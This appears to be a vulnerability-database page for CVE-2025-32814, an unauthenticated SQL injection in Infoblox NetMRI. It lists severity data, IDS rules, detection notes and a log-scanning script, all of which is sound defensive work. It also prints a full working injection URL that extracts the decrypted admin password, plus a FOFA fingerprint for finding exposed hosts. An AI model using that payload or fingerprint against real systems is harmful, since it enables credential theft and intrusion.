CVE-2025-32814
Published 2025-05-22
CVE-2025-32814: An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
Priority P191 · critical · 9.8 · CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 36.41% (98.3th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| infoblox | netmri | < 7.6.1 | 7.6.1 |
Detection & IOCs
url: /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN
path: /netmri/config/userAdmin/login.tdf
other: fofa-query: icon_hash="-319724102"
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2025_32814, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_06_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Exploit requests use HTTP GET to /netmri/config/userAdmin/login.tdf with the skipjackUsername parameter containing error-based SQL injection via updatexml() and the NetmriDecrypt() function to extract encrypted credentials from the skipjack.ACLUser table.
- Successful exploitation produces an XPATH syntax error response in the HTTP body containing the extracted credential value between tilde (~) delimiters, matchable with regex: XPATH syntax error: '~(.*?)~'
- Detection should look for the string 'netmridecrypt' (case-insensitive) in the URI query string following the skipjackUsername parameter, as this is the proprietary decryption function abused in the attack payload.
- The Snort/ET rule (sid:2062742) targets HTTP GET requests where the URI starts with /netmri/config/userAdmin/login.tdf? and contains both skipjackUsername= and netmridecrypt (case-insensitive). TLS decryption (tls_state TLSDecrypt) is required for encrypted traffic inspection.
- The attack is unauthenticated (PR:N) and network-reachable (AV:N), so any inbound GET to the login.tdf endpoint with SQL metacharacters in skipjackUsername from an unauthenticated session is suspicious.
- The Snort rule (sid:2062742) requires TLS decryption to be effective against HTTPS-protected NetMRI deployments, as the attack payload travels in the URI query string.
- The Nuclei template targets Infoblox NetMRI versions before 7.6.1; the FOFA fingerprint icon_hash=-319724102 can be used to identify exposed instances for proactive scanning.
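A log-side version of the checks listed above, as an added example (not taken from the advisory, the ET rule set or the Nuclei template): it applies the sid:2062742 match conditions and the SQL-metacharacter heuristic to web access logs, and the quoted regex to response bodies. The combined log format, the sample lines and the token list in `SQL_META_RE` are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

LOGIN_PATH = "/netmri/config/userAdmin/login.tdf"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# Heuristic (assumption): tokens that do not belong in a username.
SQL_META_RE = re.compile(r"""["'();]|--|/\*|\b(select|union|updatexml|concat)\b""", re.I)
# Error-based leak marker quoted in the detection notes.
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")

def classify_request(method, uri):
    """Return 'exploit', 'suspicious' or 'clean' for one request."""
    parts = urlsplit(uri)
    if method != "GET" or parts.path != LOGIN_PATH:
        return "clean"
    idx = parts.query.find("skipjackUsername=")
    if idx == -1:
        return "clean"
    # Same condition as sid:2062742: 'netmridecrypt' (any case) after the parameter.
    if "netmridecrypt" in unquote_plus(parts.query[idx:]).lower():
        return "exploit"
    user = parse_qs(parts.query, keep_blank_values=True).get("skipjackUsername", [""])[0]
    return "suspicious" if SQL_META_RE.search(user) else "clean"

def response_leaks(body):
    """True if a response body carries the tilde-delimited XPATH error."""
    return bool(LEAK_RE.search(body))

def scan_log(lines):
    """Return (line_number, verdict) for every non-clean request line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            verdict = classify_request(m["method"], m["uri"])
            if verdict != "clean":
                hits.append((n, verdict))
    return hits

# Constructed access-log lines; the injected expression is redacted.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2025:10:00:00 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=alice&mode=DO-LOGIN HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jun/2025:10:00:05 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),NETMRIDECRYPT(REDACTED),null)--%22&mode=DO-LOGIN HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jun/2025:10:00:09 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22--&mode=DO-LOGIN HTTP/1.1" 200 301',
    '198.51.100.4 - - [01/Jun/2025:10:01:00 +0000] "POST /netmri/config/userAdmin/login.tdf HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, verdict in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Unlike the network rule, this runs on logs written after TLS termination, so it does not depend on TLS decryption at a sensor.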
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
ghsa_unreviewed·2025-05-22
CVE-2025-32814 [CRITICAL] CWE-89 GHSA-gfm6-h4jq-qp9r: An issue was discovered in Infoblox NETMRI before 7
VulnCheck
infoblox netmri Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2025·CVSS 9.8
CVE-2025-32814 [CRITICAL] infoblox netmri Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected: infoblox netmri
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-14&host_type=src&vulnerability=cve-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-15&host_type=src&vulnerability=cve-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerabili
Suricata
ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)
suricata·2025-06-04·CVSS 5.3
CVE-2025-32814 [MEDIUM] ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/visual/ViewerFileServlet|3f|"; fast_pattern; startswith; content:"filename|3d 2f|"; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; reference:cve,2024-54188; classtype:attempted-admin; sid:2062744; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2024_54188, deployment Perimeter, deploymen
Suricata
ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)
suricata·2025-06-04·CVSS 9.8
CVE-2025-32814 [CRITICAL] ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CV
Nuclei
NetMRI Unauthenticated SQL Injection via skipjackUsername
nuclei·CVSS 9.8
CVE-2025-32814 [CRITICAL] NetMRI Unauthenticated SQL Injection via skipjackUsername
Template:
id: CVE-2025-32814
info:
  name: NetMRI Unauthenticated SQL Injection via skipjackUsername
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
  impact: |
    Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise.
  remediation: |
    Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32814
    - https
No writeups or analysis indexed.